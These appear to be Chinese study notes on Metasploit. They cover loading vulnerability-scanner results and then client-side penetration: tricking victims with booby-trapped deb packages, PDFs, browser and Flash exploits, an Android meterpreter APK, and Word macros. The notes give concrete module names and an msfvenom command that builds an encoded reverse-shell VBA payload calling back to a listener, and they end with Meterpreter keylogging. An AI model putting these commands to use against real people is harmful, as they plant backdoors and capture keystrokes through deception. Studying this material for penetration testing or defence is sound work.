MSF-扫描器和客户端渗透

扫描器扫描

Openvas(GVM)
  • Load openvas

    • 命令行模式,需要配置,使用繁琐
  • 直接在opevas扫描,向msf导入nbe格式扫描日志

    • db_import openvas.nbe
Nessus
  • 也是nbe格式
  • 直接调用nessus

Nextpose
  • xml格式

客户端渗透

  • 在无法突破网路边界的情况下转而攻击客户端
    • 社会工程学攻击
    • 进而渗透线上业务网络
  • 含有漏洞利用代码的WEB站点
    • 利用客户端漏洞
  • 含有漏洞利用代码的DOC、PDF等文档
  • 诱骗被害者执行Payload

打包payload进deb安装包
  • 先用msfvenom生成pyaload
  • use exploit/multi/handler
  • set payload windows/shell/reverse_tcp
  • set LHOST xxx;set LPORT xxx;
  • exploit(侦听端口)
  • 想办法让payload执行
  • Linux下可以把payload打包进deb,然后诱使目标执行。

其它方式
  • 利用Acrobat Reader漏洞执行payload
  • 构造PDF文件:exploit/widows/fileformat/adobe_utilprintf
  • 构造恶意网站:exploit/windows/browser/adobe_utilprintf
  • IE浏览器漏洞:search ms14_064
  • JRE漏洞:search java_jre
  • flash漏洞:exploit/multi/browser/adobe_flash_hacking_team_uaf
  • 生成Android后门程序
    • use payload/android/meterpreter/reverse_tcp
    • generate -f a.apk -p android -t raw
  • VBScript感染方式
    • 利用宏感染word、excel
    • 绕过某些基于文件类型检查的安全机制
    • 生成vbscript脚本:
      • msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.125 LPORT=4444 -e x86/shikata_ga_nai -f vba.exe
      • 在word把payload第一部分VBA代码保存成宏,随便起个名字
      • payload第二部分粘贴入word文档正文
  • Meterpreter
    • use priv
    • run post/windows/capture/keylog_recorder
  • search browser_autopwn

其它

apt-get install 下载目录/var/cache/apt/archives